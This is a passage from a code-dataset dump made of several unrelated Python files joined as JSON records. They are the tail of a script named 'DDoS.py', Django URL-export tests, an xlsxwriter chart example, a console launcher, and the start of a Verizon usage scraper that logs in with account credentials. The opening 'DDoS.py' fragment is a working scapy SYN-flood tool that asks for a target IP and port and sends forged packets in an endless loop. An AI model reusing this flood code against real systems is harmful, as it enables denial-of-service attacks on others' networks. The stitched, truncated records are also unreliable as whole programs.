(mainscr) for easy access.\n\ndef mainscr():\n\n os.system(\"cls\")\n print(title)\n\n os.system(\"pause\")\n\nmainscr()\n\n\n\nos.system(\"cls\")\n\n\nsc2 = '''\n\n\n Enter the destination IP Address:\n then,\n Enter the port:\n\n ex: xxx.xxx.x.x (Enter)\n xx (Enter)\n\n\n (Localhost is the Local IP)\n (Port 80 is the most common ICP, HTTP. )\n\n\n '''\n\n\n\n\n\n# Function for Second Screen, (secondscr) for easy access.\ndef secondscr():\n os.system('cls')\n\n print(sc2)\n\n print(logoascii)\n\n\nprint(secondscr())\n\n\n\n\n\n\n\ntarget_ip = input(\"IP:\")\ntarget_port = input(\"Port:\")\n\n\n\n\n\ndef DoS_synflood():\n # forge IP packet with target ip as the destination IP address\n\n ip = IP(dst=target_ip)\n\n # forge a TCP SYN packet with a random source port\n # and the target port as the destination port\n\n tcp = TCP(sport=RandShort(), dport=int(target_port), flags=\"S\")\n\n # add some flooding data \n raw = Raw(b\"X\"*65000)\n\n # stack up the layers\n p = ip / tcp / raw\n\n # send the constructed packet in a loop until CTRL+C is detected\n send(p, loop=1)\n\n\n\n\n\n\n\n\n\n\n\n\nos.system('pause')\n\n#_thread.start_new_thread(DoS_synflood())\n\n\nthreading.Thread(target=DoS_synflood()).start()\n\n\n\ninput(\"Press Enter to exit:\")\n\n# Yo buddy, still alive?\n","sub_path":"DDoS.py","file_name":"DDoS.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"252792106","text":"import mock\nimport pytest\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.test import override_settings\nfrom django.urls import LocalePrefixPattern, URLResolver, include, path, re_path\nfrom django.utils.functional import lazy\nfrom django.utils.translation import get_language\nfrom django.views import View\n\nfrom django_urlconf_export import export_urlconf\n\n\ndef test_export_route(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = [path(\"login/\", View.as_view(), name=\"login\")]\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [{\"route\": \"login/\", \"name\": \"login\"}]\n\n\ndef test_export_regex(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = [\n # 'url' is just an alias for 're_path'\n url(r\"^login/$\", View.as_view(), name=\"login\"),\n re_path(r\"^logout/$\", View.as_view(), name=\"logout\"),\n ]\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n {\"regex\": \"^login/$\", \"name\": \"login\"},\n {\"regex\": \"^logout/$\", \"name\": \"logout\"},\n ]\n\n\ndef test_export_include(mock_urlconf_module, mock_included_module):\n # Setup urls to include\n mock_included_module.urlpatterns = [\n url(r\"^red/$\", View.as_view(), name=\"red\"),\n url(r\"^blue/$\", View.as_view(), name=\"blue\"),\n ]\n\n mock_urlconf_module.urlpatterns = [url(r\"^colors/\", include(\"mock_included_module\"))]\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n {\n \"regex\": \"^colors/\",\n \"namespace\": None,\n \"app_name\": None,\n \"includes\": [{\"regex\": \"^red/$\", \"name\": \"red\"}, {\"regex\": \"^blue/$\", \"name\": \"blue\"}],\n }\n ]\n\n\n@pytest.mark.parametrize(\n \"app_name, namespace, expected_app_name, expected_namespace\",\n [\n (None, None, None, None),\n (\"app\", \"ns\", \"app\", \"ns\"),\n # Setting app_name only will set namespace = app_name\n (\"app\", None, \"app\", \"app\"),\n # NOTE: setting namespace only will cause an error\n ],\n)\ndef test_export_include_with_namespace(\n mock_urlconf_module,\n mock_included_module,\n app_name,\n namespace,\n expected_app_name,\n expected_namespace,\n):\n # Maybe set app_name on included urls module\n if app_name:\n mock_included_module.app_name = app_name\n\n # Setup urls to include\n mock_included_module.urlpatterns = [\n url(r\"^red/$\", View.as_view(), name=\"red\"),\n url(r\"^blue/$\", View.as_view(), name=\"blue\"),\n ]\n\n # Maybe set a namespace for the included urls\n if namespace:\n mock_urlconf_module.urlpatterns = [\n url(r\"^colors/\", include(\"mock_included_module\", namespace=namespace))\n ]\n else:\n mock_urlconf_module.urlpatterns = [url(r\"^colors/\", include(\"mock_included_module\"))]\n\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n {\n \"regex\": \"^colors/\",\n \"namespace\": expected_namespace,\n \"app_name\": expected_app_name,\n \"includes\": [{\"regex\": \"^red/$\", \"name\": \"red\"}, {\"regex\": \"^blue/$\", \"name\": \"blue\"}],\n }\n ]\n\n\ndef test_export_locale_prefix_pattern(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = i18n_patterns(url(r\"^$\", View.as_view(), name=\"index\"))\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n {\n \"isLocalePrefix\": True,\n \"classPath\": \"django.urls.resolvers.LocalePrefixPattern\",\n \"includes\": [{\"regex\": \"^$\", \"name\": \"index\"}],\n }\n ]\n\n\n# You can use a subclass of LocalePrefixPattern\n# and Urls Export still works\nclass CustomLocalePrefixPattern(LocalePrefixPattern):\n pass\n\n\ndef test_export_custom_locale_prefix_pattern_class(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = [\n URLResolver(CustomLocalePrefixPattern(), [url(r\"^$\", View.as_view(), name=\"index\")])\n ]\n assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n {\n \"isLocalePrefix\": True,\n \"classPath\": \"tests.django_urlconf_export.test_export_urlconf.CustomLocalePrefixPattern\",\n \"includes\": [{\"regex\": \"^$\", \"name\": \"index\"}],\n }\n ]\n\n\n_mock_supported_languages = [\n (\"en\", {\"bidi\": False, \"code\": \"en\", \"name\": \"English\", \"name_local\": \"English\"}),\n (\n \"en-gb\",\n {\n \"bidi\": False,\n \"code\": \"en-gb\",\n \"name\": \"British English\",\n \"name_local\": \"British English\",\n },\n ),\n (\"fr\", {\"bidi\": False, \"code\": \"fr\", \"name\": \"French\", \"name_local\": \"français\"}),\n]\n\n\ndef _get_color_url_pattern():\n return {\"en\": r\"^color/$\", \"en-gb\": r\"^colour/$\", \"fr\": r\"^couleur/$\"}[get_language()]\n\n\n@override_settings(LANGUAGES=_mock_supported_languages)\ndef test_export_multi_language(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = [\n url(lazy(_get_color_url_pattern, str)(), View.as_view(), name=\"color\")\n ]\n assert export_urlconf.as_json(\"mock_urlconf_module\", language_without_country=False) == [\n {\"regex\": {\"en\": \"^color/$\", \"en-gb\": \"^colour/$\", \"fr\": \"^couleur/$\"}, \"name\": \"color\"}\n ]\n\n\n@override_settings(LANGUAGES=_mock_supported_languages)\ndef test_export_multi_language_without_country(mock_urlconf_module):\n mock_urlconf_module.urlpatterns = [\n url(lazy(_get_color_url_pattern, str)(), View.as_view(), name=\"color\")\n ]\n assert export_urlconf.as_json(\"mock_urlconf_module\", language_without_country=True) == [\n {\"regex\": {\"en\": \"^color/$\", \"fr\": \"^couleur/$\"}, \"name\": \"color\"}\n ]\n\n\n@pytest.mark.parametrize(\n \"whitelist, blacklist, expected_url_names\",\n [\n # With no blacklist or whitelist, all url names and included namespaces will be exported\n (set(), set(), {\"public-a\", \"public-b\", \"admin\", \"secret-1\", \"secret-2\", \"db-edit\"}),\n # Blacklisted names / namespaces are excluded\n (set(), {\"db-edit\"}, {\"public-a\", \"public-b\", \"admin\", \"secret-1\", \"secret-2\"}),\n # If an included namespace is blacklisted, exclude child urls too\n (set(), {\"admin\"}, {\"public-a\", \"public-b\"}),\n # Blacklist entries are regexes\n (set(), {\"secret-.\"}, {\"public-a\", \"public-b\", \"admin\", \"db-edit\"}),\n # If whitelist specified, only include these names / namespaces\n ({\"public-a\"}, set(), {\"public-a\"}),\n # Whitelist entries are regexes\n ({\"public-.\"}, set(), {\"public-a\", \"public-b\"}),\n # Blacklist overrides whitelist\n ({\"public-.\"}, {\"public-a\"}, {\"public-b\"}),\n # If you only whitelist a namespace but not any of its included urls\n # you get no results because the namespace is empty\n ({\"admin\"}, set(), set()),\n # If you only whitespace included urls but not their namespace\n # you also get no results\n ({\"secret-.\"}, set(), set()),\n # You need to whitelist both the namespace and any included url names you want to export\n ({\"admin\", \"secret-.\"}, set(), {\"admin\", \"secret-1\", \"secret-2\"}),\n ],\n)\ndef test_whitelist_and_blacklist(\n whitelist, blacklist, expected_url_names, mock_urlconf_module, mock_included_module\n):\n mock_included_module.app_name = \"admin\"\n mock_included_module.urlpatterns = [\n url(r\"^secret-1/$\", View.as_view(), name=\"secret-1\"),\n url(r\"^secret-2/$\", View.as_view(), name=\"secret-2\"),\n url(r\"^db-edit/$\", View.as_view(), name=\"db-edit\"),\n ]\n\n mock_urlconf_module.urlpatterns = [\n url(r\"^public-a/$\", View.as_view(), name=\"public-a\"),\n url(r\"^public-b/$\", View.as_view(), name=\"public-b\"),\n url(r\"^admin/$\", include(\"mock_included_module\", namespace=\"admin\")),\n ]\n assert (\n export_urlconf.get_all_allowed_url_names(\n \"mock_urlconf_module\", whitelist=whitelist, blacklist=blacklist\n )\n == expected_url_names\n )\n\n\n@mock.patch(\"django_urlconf_export.export_urlconf._get_json_urlpatterns\")\n@mock.patch(\"django.urls.get_resolver\")\n@override_settings()\ndef test_defaults_to_root_urlconf(mock_get_resolver, mock_get_json_urlpatterns):\n # simulate absence of these settings\n del settings.URLCONF_EXPORT_ROOT_URLCONF\n del settings.URLCONF_EXPORT_WHITELIST\n del settings.URLCONF_EXPORT_BLACKLIST\n del settings.URLCONF_EXPORT_LANGUAGE_WITHOUT_COUNTRY\n\n mock_resolver = mock.Mock()\n mock_get_resolver.return_value = mock_resolver\n\n export_urlconf.as_json()\n\n mock_get_resolver.assert_called_once_with(settings.ROOT_URLCONF)\n mock_get_json_urlpatterns.assert_called_once_with(mock_resolver, None, None, False)\n\n\n@mock.patch(\"django_urlconf_export.export_urlconf._get_json_urlpatterns\")\n@mock.patch(\"django.urls.get_resolver\")\n@override_settings(\n URLCONF_EXPORT_ROOT_URLCONF=\"path.to.urlconf\",\n URLCONF_EXPORT_WHITELIST=[\"whitelisted-url-name\"],\n URLCONF_EXPORT_BLACKLIST=[\"blacklisted-url-name\"],\n URLCONF_EXPORT_LANGUAGE_WITHOUT_COUNTRY=True,\n)\ndef test_can_use_django_settings(mock_get_resolver, mock_get_json_urlpatterns):\n mock_resolver = mock.Mock()\n mock_get_resolver.return_value = mock_resolver\n\n export_urlconf.as_json()\n\n mock_get_resolver.assert_called_once_with(\"path.to.urlconf\")\n mock_get_json_urlpatterns.assert_called_once_with(\n mock_resolver, [\"whitelisted-url-name\"], [\"blacklisted-url-name\"], True\n )\n","sub_path":"tests/django_urlconf_export/test_export_urlconf.py","file_name":"test_export_urlconf.py","file_ext":"py","file_size_in_byte":9333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"450048543","text":"# import xlsxwriter module\r\nimport xlsxwriter \r\n# Workbook() takes one, non-optional, argument which is the filename #that we want to create.\r\nworkbook = xlsxwriter.Workbook('chart_column.xlsx')\r\n# The workbook object is then used to add new worksheet via the #add_worksheet() method.\r\nworksheet = workbook.add_worksheet() \r\n# Create a new Format object to formats cells in worksheets using #add_format() method . \r\n# here we create bold format object .\r\nbold = workbook.add_format({'bold': 1})\r\n# create a data list .\r\nheadings = ['Number', 'Batch 1', 'Batch 2']\r\ndata = [\r\n [2, 3, 4, 5, 6, 7],\r\n [80, 80, 100, 60, 50, 100],\r\n [60, 50, 60, 20, 10, 20],\r\n] \r\n# Write a row of data starting from 'A1' with bold format .\r\nworksheet.write_row('A1', headings, bold) \r\n# Write a column of data starting from 'A2', 'B2', 'C2' respectively worksheet.write_column('A2', data[0])\r\nworksheet.write_column('B2', data[1])\r\nworksheet.write_column('C2', data[2]) \r\n# Create a chart object that can be added to a worksheet using #add_chart() method.\r\n# here we create a bar chart object .\r\nchart1 = workbook.add_chart({'type': 'column'})\r\n# Add a data series to a chart using add_series method.\r\n# Configure the first series.\r\n# = Sheet1 !$A$1 is equivalent to ['Sheet1', 0, 0].\r\nchart1.add_series({\r\n 'name': '= Sheet1 !$B$1',\r\n 'categories': '= Sheet1 !$A$2:$A$7',\r\n 'values': '= Sheet1 !$B$2:$B$7',\r\n}) \r\n# Configure a second series.Note use of alternative syntax to define #ranges.[sheetname, first_row, first_col, last_row, last_col].\r\nchart1.add_series({\r\n 'name': ['Sheet1', 0, 2],\r\n 'categories': ['Sheet1', 1, 0, 6, 0],\r\n 'values': ['Sheet1', 1, 2, 6, 2],\r\n})\r\n# Add a chart title\r\nchart1.set_title ({'name': 'Results of data analysis'})\r\n# Add x-axis label\r\nchart1.set_x_axis({'name': 'Test number'}) \r\n# Add y-axis label\r\nchart1.set_y_axis({'name': 'Data length (mm)'})\r\n# Set an Excel chart style.\r\nchart1.set_style(11) \r\n#add chart to the worksheet the top-left corner of a chart\r\n# is anchored to cell E2 .\r\nworksheet.insert_chart('E2', chart1)\r\n# Finally, close the Excel file via the close() method.\r\nworkbook.close()","sub_path":"xlchart1.py","file_name":"xlchart1.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"570300140","text":"#!/usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on 11 juin 2014\r\n\r\n@author: Alexandre Neuville\r\n\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\n\r\nfrom lib.controller import ConsoleApp\r\nfrom lib.persistence import JSONConfig\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = ArgumentParser(prog=\"console\", usage=\"%(prog)s [options]\")\r\n parser.add_argument(\"-c\", \"--config\", action=\"store\", required=True, dest=\"filename\", metavar=\"FILE\",\r\n help=\"Fichier de configuration\")\r\n\r\n args = parser.parse_args()\r\n with JSONConfig(args.filename) as config:\r\n app = ConsoleApp(config)\r\n app.execute_app()\r\n","sub_path":"an.python.console/src/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"378881449","text":"#!/bin/env python3\n\nimport datetime\nimport http.client\nimport re\nimport urllib.request\nimport xml.etree.ElementTree as ET\n\n# Thanks, http://stackoverflow.com/questions/603856/how-do-you-get-default-headers-in-a-urllib2-request\nclass PrintedHTTPConnection(http.client.HTTPConnection):\n\tdef send(self, s):\n\t\tprint(\"PrintedHTTPConnection: %s\" % s)\n\t\thttp.client.HTTPConnection.send(self, s)\n\nclass PrintedHTTPSConnection(http.client.HTTPSConnection):\n\tdef send(self, s):\n\t\tprint(\"PrintedHTTPSConnection: %s\" % s)\n\t\thttp.client.HTTPSConnection.send(self, s)\n\nclass PrintedHTTPHandler(urllib.request.HTTPHandler):\n\tdef http_open(self, req):\n\t\treturn self.do_open(PrintedHTTPConnection, req)\n\nclass PrintedHTTPSHandler(urllib.request.HTTPSHandler):\n\tdef https_open(self, req):\n\t\treturn self.do_open(PrintedHTTPSConnection, req)\n\n\"\"\"VerizonScraper is a module that retrieves account information from Verizon's\nweb interface. Verizon does not provide a convenient API for retrieving usage\ninfo, so this tool simulates a user going through the browser.\n\nTo use this module, you need your My Verizon credentials. Once the object\nexists, you can call getPhoneNumSet() and getAccountInfo().\"\"\"\nclass VerizonScraper:\n def __init__(self, username, password):\n self._initUrllib()\n self._getInitialCj()\n self.phoneNumSet = self._doLogin(username, password)\n\n self.accountInfo = {}\n for phoneNum in self.phoneNumSet:\n lineInfo = {'data': None, 'sms': None}\n lineInfo['data'] = self._getDataOverview(phoneNum)\n lineInfo['sms'] = self._getSmsOverview(phoneNum)\n self.accountInfo[phoneNum] = lineInfo\n\n \"\"\"This returns the set of phone numbers associated with the account. The\n phone numbers are formatted as strings of pure digits.\"\"\"\n def getPhoneNumSet(self):\n return self.phoneNumSet\n\n \"\"\"This returns per-line usage info. It's formed like this:\n ['phonenum': {\n 'sms': {\n usage data provided by Verizon and partially fixed-up\n },\n 'data': {\n usage data provided by Verizon and partially fixed-up\n },\n ...more phone numbers...\n ]\"\"\"\n def getAccountInfo(self):\n return self.accountInfo\n\n def _initUrllib(self):\n cj = urllib.request.HTTPCookieProcessor()\n #opener = urllib.request.build_opener(cj, PrintedHTTPHandler(), PrintedHTTPSHandler())\n opener = urllib.request.build_opener(cj)\n opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0')]\n urllib.request.install_opener(opener)\n\n def _getInitialCj(self):\n r = urllib.request.urlopen('http://www.verizonwireless.com/b2c/index.html')\n\n # The login function's responsibility is to log in to Verizon Wireless and\n # retrieve phone numbers associated with this account.\n def _doLogin(self, usernm, passwd):\n logindata = urllib.parse.urlencode({\n 'realm': 'vzw',\n 'goto': '',\n 'gx_charset': 'UTF-8',\n 'rememberUserNameCheckBoxExists': 'Y',\n 'login_select': '1',\n 'IDToken1': usernm,\n 'IDToken2': passwd,\n 'rememberUserName': 'Y',\n 'signIntoMyVerizonButton': '',\n }).encode('utf-8')\n req = urllib.request.Request('https://login.verizonwireless.com:443/amserver/UI/Login', logindata)\n req.add_header('Referer', 'https://login.vzw.com/cdsso/public/controller?action=logout')\n r = urllib.request.urlopen(req)\n\n # The layout of the webpage is a bit different depending on whether there's\n # just one line or multiple lines associated with the account. Fortunately\n # we can always search through the webpage both ways end end up with the\n # correct result.\n phoneNumRegex = re.compile('^\tSELECTED_MTN :\\'(\\d{10})\\',')\n multiPhoneRegex = re.compile('^